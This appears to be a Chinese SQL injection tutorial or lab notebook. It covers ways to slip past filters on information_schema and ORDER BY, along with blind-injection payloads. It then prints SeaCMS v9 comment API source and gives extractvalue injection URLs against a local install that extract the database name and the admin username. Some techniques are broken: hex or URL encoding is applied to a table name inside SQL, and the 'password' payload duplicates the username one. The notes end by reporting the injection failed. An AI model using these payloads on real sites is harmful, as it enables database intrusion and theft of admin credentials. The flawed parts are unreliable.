一、绕过过滤information_schema
1、大小写绕过
在某些不区分大小写的数据库环境中,可以通过改变information_schema的大小写来绕过简单的字符串过滤。
-- 正常查询
SELECT column_name FROM information_schema.columns WHERE table_name = 'your_table';-- 大小写绕过
SELECT column_name FROM InFoRmAtIoN_ScHeMa.columns WHERE table_name = 'your_table';2、注释绕过
有些过滤规则可能只检查语句的关键部分,通过添加注释来干扰过滤逻辑。
SELECT column_name FROM /*information_*/information_schema.columns WHERE table_name = 'your_table';3、编码绕过
可以尝试对information_schema进行编码,例如 URL 编码或十六进制编码。
转换成URL编码
-- 正常查询
SELECT column_name FROM information_schema.columns WHERE table_name = 'your_table';-- URL编码绕过
SELECT column_name FROM %69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61.columns WHERE table_name = 'your_table'转换成十六进制
-- 正常查询
SELECT column_name FROM information_schema.columns WHERE table_name = 'your_table';-- 十六进制编码绕过
SELECT column_name FROM 0x696E666F726D6174696F6E5F736368656D61.columns WHERE table_name = 'your_table';4、使用其他系统表
在MySQL中,如果information_schema被过滤或不可用,可以通过mysql.innodb_table_stats 和mysql.innodb_index_stats这等系统表来获取数据库的表名和索引信息
(1)mysql.innodb_table_stats 这个表存储了InnoDB表的统计信息,可以用来获取表名
-- 获取所有表名:SELECT table_name
FROM mysql.innodb_table_stats
WHERE database_name = 'your_database_name';-- 获取所有数据库的表名:SELECT database_name, table_name
FROM mysql.innodb_table_stats;(2)mysql.innodb_index_stats 这个表存储了InnoDB表的索引统计信息,可以用来获取索引名(间接推断列名)
-- 获取某个表的所有索引名:SELECT index_name
FROM mysql.innodb_index_stats
WHERE database_name = 'your_database_name' AND table_name = 'your_table_name';-- 获取所有表的索引信息:SELECT database_name, table_name, index_name
FROM mysql.innodb_index_stats;二、绕过过滤orderby
1、使用IF函数实现盲注
通过IF函数构造条件判断,结合时间延迟或布尔逻辑实现盲注
-- 基于布尔盲注SELECT * FROM users
ORDER BY IF(1=1, username, password);-- 基于时间盲注SELECT * FROM users
ORDER BY IF(1=1, SLEEP(1), username);2、使用case语句实现盲注
通过case语句构造条件判断,结合时间延迟或布尔逻辑实现盲注。
-- 基于布尔盲注SELECT * FROM users
ORDER BY CASE WHEN 1=1 THEN username ELSE password END;-- 基于时间盲注SELECT * FROM users
ORDER BY CASE WHEN 1=1 THEN SLEEP(1) ELSE username END;3、使用SUBSTRING和ASCII函数实现盲注
通过SUBSTRING和ASCII函数逐字符推断数据
-- 基于布尔盲注SELECT * FROM users
ORDER BY IF(ASCII(SUBSTRING(username, 1, 1)) = 97, 1, 0);-- 基于时间盲注SELECT * FROM users
ORDER BY IF(ASCII(SUBSTRING(username, 1, 1)) = 97, SLEEP(1), 0);4、 使用UNION SELECT实现盲注
-- 基于布尔盲注UNION SELECT 1, 2, 3
FROM users
WHERE (SELECT COUNT(*) FROM users WHERE username LIKE 'a%') > 0;-- 基于时间盲注UNION SELECT 1, 2, SLEEP(1)
FROM users
WHERE (SELECT COUNT(*) FROM users WHERE username LIKE 'a%') > 0;三、seacmsv9注入管理员账号密码
后端代码
<?php
session_start();
require_once("../../include/common.php");
$id = (isset($gid) && is_numeric($gid)) ? $gid : 0;
$page = (isset($page) && is_numeric($page)) ? $page : 1;
$type = (isset($type) && is_numeric($type)) ? $type : 1;
$pCount = 0;
$jsoncachefile = sea_DATA."/cache/review/$type/$id.js";
//缓存第一页的评论
if($page<2)
{if(file_exists($jsoncachefile)){$json=LoadFile($jsoncachefile);die($json);}
}
$h = ReadData($id,$page);
$rlist = array();
if($page<2)
{createTextFile($h,$jsoncachefile);
}
die($h); function ReadData($id,$page)
{global $type,$pCount,$rlist;$ret = array("","",$page,0,10,$type,$id);if($id>0){$ret[0] = Readmlist($id,$page,$ret[4]);$ret[3] = $pCount;$x = implode(',',$rlist);if(!empty($x)){$ret[1] = Readrlist($x,1,10000);}} $readData = FormatJson($ret);return $readData;
}function Readmlist($id,$page,$size)
{global $dsql,$type,$pCount,$rlist;$ml=array();if($id>0){$sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";$rs = $dsql ->GetOne($sqlCount);$pCount = ceil($rs['dd']/$size);$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC limit ".($page-1)*$size.",$size ";$dsql->setQuery($sql);$dsql->Execute('commentmlist');while($row=$dsql->GetArray('commentmlist')){$row['reply'].=ReadReplyID($id,$row['reply'],$rlist);$ml[]="{\"cmid\":".$row['id'].",\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".date("Y/n/j H:i:s",$row['dtime'])."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";}}$readmlist=join($ml,",");return $readmlist;
}function Readrlist($ids,$page,$size)
{global $dsql,$type;$rl=array();$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";$dsql->setQuery($sql);$dsql->Execute('commentrlist');while($row=$dsql->GetArray('commentrlist')){$rl[]="\"".$row['id']."\":{\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".$row['dtime']."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";}$readrlist=join($rl,",");return $readrlist;
}function ReadReplyID($gid,$cmid,&$rlist)
{global $dsql;if($cmid>0){if(!in_array($cmid,$rlist))$rlist[]=$cmid;$row = $dsql->GetOne("SELECT reply FROM sea_comment WHERE id=$cmid limit 0,1");if(is_array($row)){$ReplyID = ",".$row['reply'].ReadReplyID($gid,$row['reply'],$rlist);}else{$ReplyID = "";}}else{$ReplyID = "";}return $ReplyID;
}function FormatJson($json)
{$x = "{\"mlist\":[%0%],\"rlist\":{%1%},\"page\":{\"page\":%2%,\"count\":%3%,\"size\":%4%,\"type\":%5%,\"id\":%6%}}";for($i=6;$i>=0;$i--){$x=str_replace("%".$i."%",$json[$i],$x);}$formatJson = jsonescape($x);return $formatJson;
}function jsonescape($txt)
{$jsonescape=str_replace(chr(13),"",str_replace(chr(10),"",json_decode(str_replace("%u","\u",json_encode("".$txt)))));return $jsonescape;
}获取数据库名
http://127.0.0.1/upload9.1/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,database())),@`%27`
获取用户名
http://127.0.0.1/upload9.1/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(name)from%20sea_admin))),@`%27`获取用户密码
http://127.0.0.1/upload9.1/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(name)from%20sea_admin))),@`%27`
注入失败